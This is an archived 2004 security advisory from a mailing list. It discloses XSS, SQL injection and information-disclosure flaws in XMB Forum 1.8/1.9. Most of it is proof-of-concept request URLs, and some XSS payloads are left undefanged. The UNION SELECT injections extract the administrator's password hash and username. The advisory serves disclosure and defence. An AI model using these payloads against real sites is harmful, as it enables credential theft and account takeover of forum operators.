[UNIX] Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative Password Disclosure)

From: SecuriTeam (support_at_securiteam.com)
Date: 03/30/04

  • Next message: SecuriTeam: "[UNIX] phpBB SQL Injection Vulnerability (privmsg.php)"
    To: list@securiteam.com
    Date: 30 Mar 2004 13:13:19 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Multiple Vulnerabilities in XMB Forum (CSS, SQL Injection, Administrative
    Password Disclosure)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.xmbforum.com/> XMB Forum is "a free web-based bulletin board
    system written in PHP with a MySQL backend."

    Multiple vulnerabilities have been found in XMB including several
    cross-site scripting bugs, SQL injections and information disclosure.

    DETAILS

    Vulnerable Systems:
     * XMB version 1.8 Partagium SP3
     * XMB version 1.9 Nexus beta

    PHP and web server information disclosure
    Beginning with the new Nexus release of XMB, the file named phpinfo.php
    has been added to the forum package. A snippet from the original code can
    be used to reveal the PHP version and information about the web server:

    <?php
    /* $Id: phpinfo.php, v1.00 2003/10/11 10:45:18 Tularis Exp $ */
    phpinfo();
    ?>

    Not only that a user can access phpinfo(), there is a possible cross site
    scripting vulnerability. An example follows:
    http://localhost/xmb19beta/phpinfo.php?foobar=>alert(document.cookie);</scr!pt>

    Note that the SCRIPT tag has been replaced with SCR!PT.

    Cross site scripting
    http://localhost/xmb19beta/xmb.php?show=version&xmbuser=foobar><body
    onload=a!ert(document.cookie);>

    Note: Logout before issuing the request otherwise it will not work. The
    alert action was replaced with a!ert. Another cross-site scripting
    vulnerability exists in editprofile.php (only the latest version 1.9 is
    vulnerable). An example request that exploits it:
    http://localhost/xmb19beta/editprofile.php?user=notexist_foobar&u2uheader= onload=alert(document.cookie);>

    A cross site scripting bug exists in u2u.php as well. An example would be:
    http://localhost/xmb19beta/u2u.php?folder=foobar"><body
    onload=a!ert(document.cookie);>

    And in the stats.php file there is more than one cross site scripting bug
    due to uninitialized variables ($viewmost,$replymost,$latest). Examples:
    http://localhost/xmb19beta/stats.php?action=view&viewmost="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/stats.php?action=view&replymost="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/stats.php?action=view&latest="></textarea><body
    onload=a!ert(document.cookie);>

    Another XSS bug exists in post.php where the $message and $icons variables
    are un-initialized.

    Examples:
    http://localhost/xmb19beta/post.php?action=newthread&fid=1&message="></textarea><body onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/post.php?action=newthread&fid=1&icons=
    onload=a!ert(document.cookie);>

    In the forumdisplay.php script there are also uninitialized variables
    which open the way for cross site scripting. These are
    $threadlist,$pagelinks,$forumlist,$navigation and $forumdisplay:
    http://localhost/xmb19beta/forumdisplay.php?fid=1&threadlist=
    onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&pagelinks=
    onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&forumlist=
    onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&navigation=
    onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/forumdisplay.php?fid=1&forumdisplay=
    onload=a!ert(document.cookie);>

    SQL Injection and cross site scripting
    http://localhost/xmb19beta/forumdisplay.php?fid=1&tpp=
    onload=a!ert(document.cookie);>

    Note: It will only work when no user is logged on, otherwise the $tpp
    variable will be overridden.

    An SQL injection and a cross site-scripting bug in member.php (only
    version 1.9 is vulnerable) exists. Here is a snippet of code take shows
    the bug, line 461:

    switch($self['status']){
                    case 'member';
                        $restrict .= " f.private !='3' AND";

                    case 'Moderator';

                    case 'Super Moderator';
                        $restrict .= " f.private != '2' AND";

                    case 'Administrator';
                        $restrict .= " f.userlist = '' AND f.password = ''
    AND";

                    case 'Super Administrator';
                        break;

                    default:
                        $restrict .= " f.private !='3' AND f.private != '2'
    AND f.userlist = '' AND f.password = '' AND";
                        break;
                }

    It is easily discernible that the $restrict variable is not initialized
    and hence opens up an SQL injection:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict=foobar

    Or a cross-site scripting if one wishes:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= onload=a!ert(document.cookie);>

    Better yet, it's possible to retrieve the admin's MD5 password hash from
    the database in the following manner:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT password, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*

    Or the admin's username:
    http://localhost/xmb19beta/member.php?action=viewpro&member=waraxe&restrict= f.private=-99 GROUP BY p.fid UNION SELECT username, null,99 FROM xmb_members WHERE uid=1 LIMIT 1 /*

    Yet more SQL injections and XSS vulnerabilities exists, this time in the
    misc.php script (only version 1.9 is vulnerable). Examples follow:
    http://localhost/xmb19beta/misc.php?action=search&restrict=
    onload=a!ert(document.cookie);>
    http://localhost/xmb19beta/misc.php?action=search&restrict= private=-99
    UNION SELECT null, null,password, null, null, null, null, null, null,
    null, null, null, null, null, null, null, null, null, null, null, null,
    null,null FROM xmb_members WHERE uid=1 LIMIT 1 /*

    Another SQL injection and XSS in today.php exists. However only version
    1.9 is vulnerable:
    http://localhost/xmb19beta/today.php?restrict=
    onload=alert(document.cookie);>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:come2waraxe@yahoo.com> Janek
    Vind.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] phpBB SQL Injection Vulnerability (privmsg.php)"